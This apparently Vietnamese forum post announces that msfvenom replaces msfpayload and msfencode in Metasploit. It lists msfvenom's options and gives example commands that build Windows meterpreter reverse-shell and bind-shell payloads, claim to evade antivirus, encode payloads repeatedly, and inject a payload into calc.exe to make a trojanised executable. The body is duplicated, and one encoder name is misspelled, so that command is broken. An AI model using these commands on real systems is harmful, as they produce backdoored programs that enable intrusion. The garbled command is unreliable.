DDos
VIP Members
-
22/10/2013
-
524
-
2.191 bài viết
Lời chào tạm biệt tới msfpayload và msfencode
Ai trong số chúng ta đã và đang sử dụng metasploit làm công cụ để thực hành, học tập, và nghiên cứu bảo mật đã từng nghe qua tới hai công cụ msfpayload và msfencode. Nhưng trong những ngày gần đây, đội ngũ phát triển của metasploit đã chính thức công bố sự kết thúc của hai công cụ này, và sẽ không còn hỗ trợ hoặc có bất kỳ một bản vá lỗi nào cho nó nữa. Kể từ ngày 8/6/2015, toàn bộ những thứ liên quan tới msfpayload và msfencode sẽ được loại bỏ hoàn toàn ra khỏi metasploit, và nó được thay thế bởi msfvenom. Msfvenom là sự kết hợp của msfpayload và msfencode, đã được đội ngũ phát triển thử nghiệm từ 3.5 trước đây.
msfpayload và msfencode đã đi cùng với cộng đồng hacking từ hơn 10 năm nay, và chúng ta đã quá quen thuộc với nó, từ những bài hướng dẫn bằng văn bản, hay bằng video trên youtube, hay tất cả cách sách viết về bảo mật. Nhưng hôm nay, chúng ta sẽ nói lời tạm biệt chúng và bắt đầu làm quen với công cụ với mang tên msfvenom.
Cách sử dụng Msfvenom
-p, --payload Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled Prepend a nopsled of [length] size on to the payload
-f, --format Output format (use --help-formats for a list)
-e, --encoder [encoder] The encoder to use
-a, --arch The architecture to use --platform The platform of the payload
-s, --space The maximum size of the resulting payload
-b, --bad-chars The list of characters to avoid example: '\x00\xff'
-i, --iterations The number of times to encode the payload
-c, --add-code Specify an additional win32 shellcode file to include
-x, --template Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --options List the payload's standard options
-h, --help Show this message --help-formats List available formats
Ví dụ 1: Nếu bạn muốn liệt kê tất cả các payload trong metasploit, bạn chỉ cần nhập lệnh:
./msfvenom -l payloads
Ví dụ 2: Đưa ra một payload windows/metepreter/reverse_tcp:
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe
Ví dụ 3: Đưa ra một payload mà có khả năng vượt qua phần mềm diệt virus
./msfvenom -p windows/meterpreter/bind_tcp -b '\x80'
Ví dụ 4: Đưa ra một payload với một công cụ mã hóa và số lần mã hóa:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_ta -i 3
Ví dụ 5: Inject một payload vào calc.exe và lưu chúng và một file mới new.exe:
./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -k -f exe > new.exe
P/s: Các bạn nên làm quen ngay với công cụ này nhé, để sau khi họ chính thức gỡ bở msfencode và msfpayload thì bạn sẽ không còn bỡ ngỡ nữa.
msfpayload và msfencode đã đi cùng với cộng đồng hacking từ hơn 10 năm nay, và chúng ta đã quá quen thuộc với nó, từ những bài hướng dẫn bằng văn bản, hay bằng video trên youtube, hay tất cả cách sách viết về bảo mật. Nhưng hôm nay, chúng ta sẽ nói lời tạm biệt chúng và bắt đầu làm quen với công cụ với mang tên msfvenom.
Cách sử dụng Msfvenom
-p, --payload Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled Prepend a nopsled of [length] size on to the payload
-f, --format Output format (use --help-formats for a list)
-e, --encoder [encoder] The encoder to use
-a, --arch The architecture to use --platform The platform of the payload
-s, --space The maximum size of the resulting payload
-b, --bad-chars The list of characters to avoid example: '\x00\xff'
-i, --iterations The number of times to encode the payload
-c, --add-code Specify an additional win32 shellcode file to include
-x, --template Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --options List the payload's standard options
-h, --help Show this message --help-formats List available formats
Ví dụ 1: Nếu bạn muốn liệt kê tất cả các payload trong metasploit, bạn chỉ cần nhập lệnh:
./msfvenom -l payloads
Ví dụ 2: Đưa ra một payload windows/metepreter/reverse_tcp:
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe
Ví dụ 3: Đưa ra một payload mà có khả năng vượt qua phần mềm diệt virus
./msfvenom -p windows/meterpreter/bind_tcp -b '\x80'
Ví dụ 4: Đưa ra một payload với một công cụ mã hóa và số lần mã hóa:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_ta -i 3
Ví dụ 5: Inject một payload vào calc.exe và lưu chúng và một file mới new.exe:
./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -k -f exe > new.exe
P/s: Các bạn nên làm quen ngay với công cụ này nhé, để sau khi họ chính thức gỡ bở msfencode và msfpayload thì bạn sẽ không còn bỡ ngỡ nữa.
Chỉnh sửa lần cuối bởi người điều hành: